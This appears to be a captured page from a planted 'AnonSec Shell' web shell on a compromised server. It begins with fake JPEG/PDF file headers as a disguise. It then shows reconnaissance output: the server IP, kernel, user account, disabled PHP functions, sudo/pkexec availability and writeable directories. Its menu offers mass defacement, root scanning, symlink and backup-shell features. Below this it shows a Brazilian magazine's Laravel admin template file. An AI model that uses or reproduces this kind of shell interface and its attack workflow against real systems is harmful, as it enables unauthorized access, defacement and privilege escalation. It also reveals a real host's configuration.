ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.185   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/admin/resources/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/admin/resources/views//master.blade.php
<!DOCTYPE html>

<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Evidência Revista - Painel Administrativo | Login</title>

	<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">

	<link rel="stylesheet" href="{{ asset('css/app.css') }}">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
	<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">


	<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
	<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
	<!--[if lt IE 9]>
	<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
	<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
	<![endif]-->
</head>

<body class="hold-transition skin-red sidebar-mini">

	<div class="load-page"></div>

	<div class="msg-all col-lg-6 text-center">
		@if($errors->any())
		<div class="alert alert-danger alert-dismissible fade in" role="alert">
			<button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
				aria-hidden="true">×</span>
			</button>
			@foreach($errors->all() as $error)
			<div><i class="glyphicon glyphicon-alert"></i> {{ $error }}</div>
			@endforeach
		</div>
		@endif

		@if(Session::has('ok'))
		<div class="alert alert-success msg-all col-lg-6">
			<button type="button" class="close" data-dismiss="alert" aria-label="Close">
				<span aria-hidden="true">×</span>
			</button>
			<i class="glyphicon glyphicon-ok"></i> {{ Session::get('ok') }}</div>
			@endif
		</div>


		@if(Session::has('task'))
		<div class="alert alert-success msg-all-static col-lg-8">
			<button type="button" class="close" data-dismiss="alert" aria-label="Close">
				<span aria-hidden="true">×</span>
			</button>
			<i class="glyphicon glyphicon-ok"></i> {{ Session::get('task') }}</div>
			@endif


			<div class="wrapper">

				<!-- Main Header -->
				<header class="main-header">

					<!-- Logo -->
					<a href="{{ route('home.index') }}" class="logo">
						<!-- mini logo for sidebar mini 50x50 pixels -->
						<span class="logo-mini">EV</span>
						<!-- logo for regular state and mobile devices -->
						<span class="logo-lg">Evidência Revista</span>
					</a>

					<!-- Header Navbar -->
					<nav class="navbar navbar-static-top" role="navigation">
						<!-- Sidebar toggle button-->
						<a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
							<span class="sr-only">Toggle navigation</span>
						</a>
						<!-- Navbar Right Menu -->
						<div class="navbar-custom-menu">
							<ul class="nav navbar-nav">


								<li>
									<a href="#" style="font-weight: bold; font-size: 0.9em; color: #fff">
										<?php setlocale(LC_ALL, 'pt_BR', 'ptb'); ?>
										{{ \Carbon\Carbon::now()->formatLocalized('%A, %d de %B de %Y') }}
									</a>
								</li>


								<!-- User Account Menu -->
								<li class="dropdown user user-menu">
									<!-- Menu Toggle Button -->
									<a href="#" class="dropdown-toggle" data-toggle="dropdown">
										<!-- The user image in the navbar-->
										@if(Auth::user()->file == null)
										<img src="{{ asset('images/avatar.png') }}"
										class="user-image" alt="User Image">
										@else
										<img src="{{ asset('uploads/users/avatar/'.Auth::user()->file) }}"
										class="user-image" alt="User Image">
										@endif

										<!-- hidden-xs hides the username on small devices so only the image appears. -->
										<span class="hidden-xs">{{ Auth::user()->name }}</span>
									</a>
									<ul class="dropdown-menu">
										<!-- The user image in the menu -->
										<li class="user-header">
											@if(Auth::user()->file == null)
											<img src="{{ asset('images/avatar.png') }}"
											class="img-circle" alt="User Image">
											@else
											<img src="{{ asset('uploads/users/avatar/'.Auth::user()->file) }}"
											class="img-circle" alt="User Image">
											@endif
											<p>{{ Auth::user()->name }} - {{ Auth::user()->function }}</p>
										</li>

										<li class="user-footer">

											<a href="{{ route('avatar.edit') }}" class="btn btn-default btn-flat margin-top">
												<i class="glyphicon glyphicon-camera"></i> Avatar</a>

												<a href="{{ route('profile.edit') }}" class="btn btn-default btn-flat margin-top">
													<i class="glyphicon glyphicon-user"></i> Perfil</a>

													<a href="{{ route('login.logout') }}" class="btn btn-default btn-flat margin-top">
														<i class="glyphicon glyphicon-off"></i> Sair</a>
													</li>
												</ul>
											</li>
											<!-- Control Sidebar Toggle Button -->

											{{--<li>
											<a href="#" data-toggle="control-sidebar"><i class="fa fa-gears"></i></a>
										</li>--}}

									</ul>
								</div>
							</nav>
						</header>
						<!-- Left side column. contains the logo and sidebar -->
						<aside class="main-sidebar">

							<!-- sidebar: style can be found in sidebar.less -->
							<section class="sidebar">

								<!-- Sidebar user panel (optional) -->
								<div class="user-panel">
									<div class="pull-left image">
										@if(Auth::user()->file == null)
										<img src="{{ asset('images/avatar.png') }}"
										class="img-circle" alt="User Image">
										@else
										<img src="{{ asset('uploads/users/avatar/'.Auth::user()->file) }}"
										class="img-circle" alt="User Image">
										@endif

									</div>
									<div class="pull-left info">
										<p>{{ Auth::user()->name }}</p>
										<!-- Status -->
										<a href="#"><i class="fa fa-circle text-success"></i> Online</a>
									</div>
								</div>

								<!-- search form (Optional) -->
								<form action="#" method="get" class="sidebar-form">
									<div class="input-group">
										<input type="text" name="q" class="form-control" placeholder="Buscar...">
										<span class="input-group-btn">
											<button type="submit" name="search" id="search-btn" class="btn btn-flat"><i
												class="fa fa-search"></i>
											</button>
										</span>
									</div>
								</form>
								<!-- /.search form -->


								<!-- Sidebar Menu -->
								<ul class="sidebar-menu">


									<li class="header"><i class="glyphicon glyphicon-cog"></i> GERENCIAR CONTEÚDO</li>

									<li>
										<a href="{{ route('post.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Meu Blog</span>
										</a>
									</li>


									@if(Auth::user()->nivel == 1)
									<li class="header"><i class="glyphicon glyphicon-cog"></i> PAINEL ADMINISTRATIVO</li>
									<li>
										<a href="{{ route('category.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Categorias</span>
										</a>
									</li>

									<li>
										<a href="{{ route('slide.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Slides</span>
										</a>
									</li>

									<li>
										<a href="{{ route('parceiro.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Parceiros</span>
										</a>
									</li>


									<li>
										<a href="{{ route('revista.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Revistas</span>
										</a>
									</li>
									

									<li>
										<a href="{{ route('sobre.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Sobre</span>
										</a>
									</li>

									<li>
										<a href="{{ route('post.admin.index') }}"><i class="fa fa-circle-o text-white"></i>
											<span>Gerenciar posts</span>
										</a>
									</li>

									<li>
										<a href="{{ route('users.index') }}"><i class="glyphicon glyphicon-user text-white"></i>
											<span>Usuários</span>
										</a>
									</li>
									@endif


								</ul>
								<!-- /.sidebar-menu -->


							</section>
							<!-- /.sidebar -->
						</aside>


						<!-- CONTENT -->
						<div class="content-wrapper bg-silver">
							@yield('content')
						</div>
						<!-- /.CONTENT -->


						<!-- Main Footer -->
						<footer class="main-footer">
							<!-- To the right -->
							<div class="pull-right hidden-xs">
								agenciaboomerang.com.br
							</div>
							<!-- Default to the left -->
							<strong> &copy; 2016 <a href="#">Agência Boomerang</a></strong>
						</footer>


						<div class="control-sidebar-bg"></div>
					</div>
					<!-- ./wrapper -->

					<script src="{{ asset('js/app.js') }}"></script>
					<script src="{{ asset('tinymce/tinymce.min.js') }}"></script>
					<script src="{{ asset('tinymce/tinymce.init.js') }}"></script>
					<script>
						$(document).ready(function () {
							$('.del').click(function () {
								$('.load-page').fadeIn('fast');
							});
						});
					</script>

				</body>
				</html>

Anon7 - 2022
AnonSec Team